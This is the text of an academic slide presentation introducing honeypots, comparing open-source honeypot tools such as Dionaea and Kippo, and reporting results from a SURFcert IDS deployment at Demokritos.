Εμμανουήλ Βασιλομανωλάκης

Υποψήφιος ΔιδάκτωρTelecooperation Group, Technische Universität DarmstadtCenter for Advanced Security Research Darmstadt (CASED)

Συνεργάτης Εργ. Δικτύων ISLAB, ΙΠΤ, ΔΗΜΟΚΡΙΤΟΣmanolis@cased.de

A short introduction to honeypots

Outline

4/21/2013 Telecooperation Group | CASED

Introduction Classifications Deployment Architectures Open source vs. nothing 2 Honeypots SURFcert IDS & experiences from Demokritos Future work - ideas

Introduction

4/21/2013 Telecooperation Group | CASED

Definition: “A security resource who's value lies in being probed, attacked or compromised”

Doesn’t have to be a system: Honeytokens We want to get compromised! Certainly not a standalone security mechanism.

Why? • FUN!• No false-positives!• Research: Malware analysis/reverse engineering• Reducing available attack surface/early warning system

Honeypot Classifications

4/21/2013 Telecooperation Group | CASED

Low interaction: simulate network operations (usually at the tcp/ip stack)

[Medium interaction: simulate network operations(with more “sophisticated” ways)]

High interaction: real systems(e.g., VMs)

Other classifications: • Purpose: Generic, Malware collectors, SSH, etc.• Production – Research (not really useful)

Honeypot Deployment Architectures

4/21/2013 Telecooperation Group | CASED

Open Source vs. nothing (really!)

4/21/2013 Telecooperation Group | CASED

Honeypot Type OS Language GUI LicenseHoneyd Generic LINUX C N GNU

Nepenthes Malware LINUX C N GNUDionaea Malware LINUX PYTHON N GNU

Honeytrap Generic LINUX C N GNULaBrea Generic LINUX C N GNUTiny HP Generic LINUX PERL N GNU

HoneyBot Malware WINDOWS - Y CLOSEDGoogle Hack

HPWEB - PHP Y GNU

Multipot Malware WINDOWS VB 6 Y GNUGlastopf WEB - PYTHON Y GNUKojoney SSH LINUX PYTHON N GNUKippo SSH LINUX PYTHON N BSDAmun Malware LINUX PYTHON N GNU

Omnirova Malware WINDOWS Borland Delphi Y GNUBillyGoat Malware - ? ? CLOSEDArtemisa VOIP - PYTHON N GNUGHOST USB WINDOWS C Y GNU

Dionaea

4/21/2013 Telecooperation Group | CASED

Low Interaction honeypot for collecting malware

Nepenthes successor

Basic protocol simulated: SMB (port 445)

Others: HTTP, HTTPS, FTP, TFTP, MSSQL and SIP (VOIP) Also supports IPv6 and TLS

Malware files: stored locally or/and sent to 3rd party entities (CWSandbox, Norman Sandbox, Anubis, VirusTotal)

Kippo (1/2)

4/21/2013 Telecooperation Group | CASED

Low interaction SSH honeypot

Features:• Presenting a fake (but “functional”) system to the attacker

(resembling a Debian 5.0 installation) • Attacker can download his tools through wget, and we save

them for later inspection (cool!)• Session logs are stored in an UML- compatible format for

easy replay with original timings (even cooler!)

Easy to install, but hard to get hackers!

SURFcert IDS

4/21/2013 Telecooperation Group | CASED

An open source (GPLv2) distributed intrusion detection system based on honeypots

Sensors, act as proxies, forwarding network traffic from the monitored network to the system’s center using OpenVPN

Supported Honeypots: Nepenthes, Dionaea, Argos, Kippo

Three parts:Tunnel – honeypot serverWeb – Logging serverSensors

SURFcert IDS

4/21/2013 Telecooperation Group | CASED

Also:• Supports p0f for attackers’ OS detection• Statistics, nice web-GUI, sensor status, geographical

visualizations, and more…

SURFcert IDS @ Demokritos

4/21/2013 Telecooperation Group | CASED

Some stats:• 21.000 attacks on 3 different sensors (1 month)• 1500 malware files downloaded• Main target: port 445

Successfully detected infected systems, inside our network (mostly with a Conficker Worm variant)

Automatic malware analysis can give us valuable informationon Botnets (and their C&C IRC servers)

Possible to find zero-date exploits / new malware (or different variants)

Future Work - Ideas

4/21/2013 Telecooperation Group | CASED

Features:

Better visualization Anti-evasion techniquesCheap & easy mobile sensors:Raspberry PiAdvertising honeypots

Honeypots:

Mobile honeypots (e.g., Android)SCADA – Industrial Control Systems (ICS)

Attacker scans our system

Attacker trying to connect to our “ftp” server

Thank You Questions?

Telecooperation Group | CASED

Backup slides

Telecooperation Group | CASED

Useful Links

4/21/2013 Telecooperation Group | CASED

Interesting stuff: • http://www.islab.demokritos.gr – Many honeypot-related theses available • https://

www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots - Report from ENISA regarding honeypots

• http://publicids.surfnet.nl:8080/surfnetids/login.php - Demo version of SURFcert IDS

Honeypots:• http://www.honeynet.org – General information on honeypots• http://dionaea.carnivore.it – Dionaea honeypot• http://amunhoney.sourceforge.net – Amun honeypot• http://map.honeynet.org – Honeypots visualization

SURFcert IDS @ Demokritos

4/21/2013 Telecooperation Group | CASED

DMZ X

DMZ 1

DMZ 2

Institute AInstitute B

Honeynet IP space

InternalFirewall

WEB – DB SERVER

TUNNEL – HONEYPOT SERVER

INTERNAL MANAGEMENT PC

Sensor 1Sensor 2

Sensor 3

[outside main firewall]

[inside main firewall]